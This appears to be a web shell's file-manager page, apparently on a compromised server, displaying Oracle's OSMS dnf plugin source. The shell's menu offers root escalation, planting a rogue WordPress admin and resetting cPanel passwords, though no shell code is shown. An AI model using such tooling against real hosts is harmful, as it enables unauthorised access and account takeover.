Aurora
Adminer
Auto Root
WP Admin
cPanel Reset
Anti Backdoor
Root
lib
python3.9
site-packages
dnf-plugins
Upload
New Folder
New File
Name
Size
Permissions
Actions
..
-
-
-
Upload File
Select File
New Folder
Folder Name
New File
File Name
Add WordPress Admin
Database Host
Database Name
Database User
Database Password
Admin Username
Admin Password
cPanel Password Reset
Email Address
Edit: osmsplugin.py
# Copyright (c) 2021, Oracle and/or its affiliates. All rights reserved. # Licensed under the Universal Permissive License v 1.0 as shown at https://opensource.org/licenses/UPL. import copy import errno import json import logging import os import sys import dnf from dnf.conf.config import PRIO_PLUGINCONFIG import dnf.exceptions from dnfpluginscore import _, logger import librepo sys.path.insert(0, '/usr/share/oracle-cloud-agent/plugins/osms') from osms import actions from osms import config from osms.i18n import ustr from osms.server import get_cacert, get_proxy, OsmsServer STORED_CHANNELS_NAME = '_osms.json' RHN_DISABLED = _("OSMS based repositories will be disabled.") COMMUNICATION_ERROR = _("There was an error communicating with OSMS server.") NOT_REGISTERED_ERROR = _("This system is not registered with OSMS server.") UPDATES_FROM_OSMS = _("This system is receiving updates from OSMS server.") GPG_KEY_REJECTED = _( "For security reasons packages from OSMS based repositories can be " "verified only with locally installed gpg keys. GPG key '%s' has been " "rejected." ) PROFILE_NOT_SENT = _("Package profile information could not be sent.") MISSING_HEADER = _("Missing required login information for OSMS: %s") MUST_BE_ROOT = _('OSMS plugin has to be run under with the root privileges.') class OsmsPlugin(dnf.Plugin): name = 'osmsplugin' def __init__(self, base, cli): super(OsmsPlugin, self).__init__(base, cli) self.base = base self.cli = cli self.stored_channels_path = os.path.join(self.base.conf.persistdir, STORED_CHANNELS_NAME) self.connected_to_osms = False self.up2date_cfg = {} self.conf = copy.copy(self.base.conf) self.parser = self.read_config(self.conf) if "main" in self.parser.sections(): options = self.parser.items("main") for (key, value) in options: self.conf._set_value(key, value, PRIO_PLUGINCONFIG) if not dnf.util.am_i_root(): logger.warning(MUST_BE_ROOT) self.conf.enabled = False if not self.conf.enabled: return if self.conf.debuglevel == 2: log_level = 'INFO' elif self.conf.debuglevel > 2: log_level = 'DEBUG' elif self.conf.debuglevel < 2: log_level = 'WARNING' init_root_logger(log_level) logger.debug('initialized OSMS plugin') self.activate_channels() def config(self): if not self.conf.enabled: return if self.cli: self.cli.demands.root_user = True def activate_channels(self, networking=True): enabled_channels = {} sslcacert = None force_http = 0 proxy_url = None proxy_username = None proxy_password = None login_info = None cached_channels = self._read_channels_file() if not networking: # no network communication, use list of channels from persistdir enabled_channels = cached_channels else: self.up2date_cfg = config.initUp2dateConfig() proxy_url, proxy_username, proxy_password = get_proxy(self.up2date_cfg, external=True) sslcacert = get_cacert(self.up2date_cfg) force_http = self.up2date_cfg['useNoSSLForPackages'] try: login_info = OsmsServer(timeout=self.conf.timeout).login() except Exception as e: logger.error("%s\n%s\n%s", COMMUNICATION_ERROR, RHN_DISABLED, e) return system_id = config.getSystemId() if not login_info or not system_id: logger.error("%s\n%s", NOT_REGISTERED_ERROR, RHN_DISABLED) self._write_channels_file({}) return try: channels = OsmsServer(timeout=self.conf.timeout).up2date.listChannels(system_id) except Exception as e: logger.error("%s\n%s\n%s", COMMUNICATION_ERROR, RHN_DISABLED, e) return self.connected_to_osms = True logger.info(UPDATES_FROM_OSMS) for channel in channels: if channel['last_modified']: enabled_channels[channel['label']] = dict(channel.items()) self._write_channels_file(enabled_channels) repos = self.base.repos for channel_id, channel_dict in enabled_channels.items(): cached_channel = cached_channels.get(channel_id) cached_version = None if cached_channel: cached_version = cached_channel.get('last_modified') conf = copy.copy(self.conf) if channel_id in self.parser.sections(): options = self.parser.items(channel_id) for (key, value) in options: conf._set_value(key, value, PRIO_PLUGINCONFIG) opts = { 'conf': self.base.conf, 'proxy': proxy_url, 'proxy_username': proxy_username, 'proxy_password': proxy_password, 'timeout': conf.timeout, 'sslcacert': sslcacert, 'force_http': force_http, 'cached_version': cached_version, 'login_info': login_info, 'gpgcheck': conf.gpgcheck, 'enabled': conf.enabled, } repo = OsmsRepo(channel_dict, opts) repos.add(repo) logger.debug(enabled_channels) def transaction(self): """ Update system's profile after transaction. """ if not self.conf.enabled: return if not self.connected_to_osms: # not connected so nothing to do here return try: actions.package_refresh_list(timeout=self.conf.timeout) except Exception as e: logger.error("%s\n%s\n%s", COMMUNICATION_ERROR, PROFILE_NOT_SENT, e) def _read_channels_file(self): try: with open(self.stored_channels_path, "r") as channels_file: content = channels_file.read() channels = json.loads(content) return channels except (FileNotFoundError, IOError) as e: if e.errno != errno.ENOENT: raise except json.decoder.JSONDecodeError: pass # ignore broken json and recreate it later return {} def _write_channels_file(self, var): try: with open(self.stored_channels_path, "w") as channels_file: json.dump(var, channels_file, indent=4) except (FileNotFoundError, IOError) as e: if e.errno != errno.ENOENT: raise class OsmsRepo(dnf.repo.Repo): needed_headers = [ 'X-RHN-Server-Id', 'X-RHN-Auth-User-Id', 'X-RHN-Auth', 'X-RHN-Auth-Server-Time', 'X-RHN-Auth-Expire-Offset', ] def __init__(self, channel, opts): super(OsmsRepo, self).__init__(ustr(channel['label']), opts.get('conf')) self.name = ustr(channel['name']) self.baseurl = [url + '/GET-REQ/' + self.id for url in config.getServerlURL()] self.sslcacert = opts.get('sslcacert') self.proxy = opts.get('proxy') self.proxy_username = opts.get('proxy_username') self.proxy_password = opts.get('proxy_password') try: self.gpgkey = get_gpg_key_urls(channel['gpg_key_url']) except InvalidGpgKeyLocation as e: logger.warning(GPG_KEY_REJECTED, dnf.i18n.ucd(e)) self.gpgkey = [] if channel['last_modified'] != opts.get('cached_version'): self.metadata_expire = 1 self.login_info = opts.get('login_info') self.keepalive = 0 self.bandwidth = 0 self.retries = 1 self.throttle = 0 self.timeout = opts.get('timeout') self.gpgcheck = opts.get('gpgcheck') self.force_http = opts.get('force_http') if self.id.startswith('ocid'): logger.debug("Set module_hotfixes = True for custom repository %s", self.id) self.module_hotfixes = True if opts.get('enabled'): self.enable() else: self.disable() if hasattr(self, 'set_http_headers'): # dnf > 4.0.9 on RHEL 8, Fedora 29/30 http_headers = self.create_http_headers() if http_headers: self.set_http_headers(http_headers) def create_http_headers(self): http_headers = [] for header in self.needed_headers: if header not in self.login_info: error = MISSING_HEADER % header raise dnf.Error.RepoError(error) if self.login_info[header] in (None, ''): # This doesn't work due to bug in librepo (or even deeper in libcurl) # the workaround bellow can be removed once BZ#1211662 is fixed # http_headers.append("%s;" % header) http_headers.append("%s: \r\nX-libcurl-Empty-Header-Workaround: *" % header) else: http_headers.append("%s: %s" % (header, self.login_info[header])) up2date_cfg = config.initUp2dateConfig() if up2date_cfg['tenantId']: http_headers.append('X-Tenant-Id: %s' % up2date_cfg['tenantId']) if not self.force_http: http_headers.append("X-RHN-Transport-Capability: follow-redirects=3") # libdnf will set Content-Length = '' by default. An empty string is an # invalid value for Content-Length header. Explicitly set Content-Length to 0. http_headers.append('Content-Length: 0') return http_headers def _handle_new_remote(self, destdir, mirror_setup=True): # this function is called only on dnf < 3.6.0 (up to Fedora 29) handle = super(OsmsRepo, self)._handle_new_remote(destdir, mirror_setup) http_headers = self.create_http_headers() if http_headers: handle.setopt(librepo.LRO_HTTPHEADER, http_headers) return handle def get_gpg_key_urls(key_url_string): """ Parse the key urls and validate them. key_url_string is a space seperated list of gpg key urls that must be located in /etc/pkg/rpm-gpg/. Return a list of strings containing the key urls. Raises InvalidGpgKeyLocation if any of the key urls are invalid. """ key_urls = key_url_string.split() for key_url in key_urls: if not is_valid_gpg_key_url(key_url): raise InvalidGpgKeyLocation(key_url) return key_urls class InvalidGpgKeyLocation(Exception): pass def is_valid_gpg_key_url(key_url): proto_split = key_url.split('://') if len(proto_split) != 2: return False proto, path = proto_split if proto.lower() != 'file': return False path = os.path.normpath(path) if not path.startswith('/etc/pki/rpm-gpg/'): return False return True def init_root_logger(log_level): # DNF doesn't setup root logger. Logs to root logger go to the console by # default, which interferes with dnf cli. Disable them before # DNF introduces a solution. root_logger = logging.getLogger() if root_logger.hasHandlers(): return root_logger.propagate = 0 root_logger.addHandler(logging.NullHandler()) root_logger.setLevel(log_level)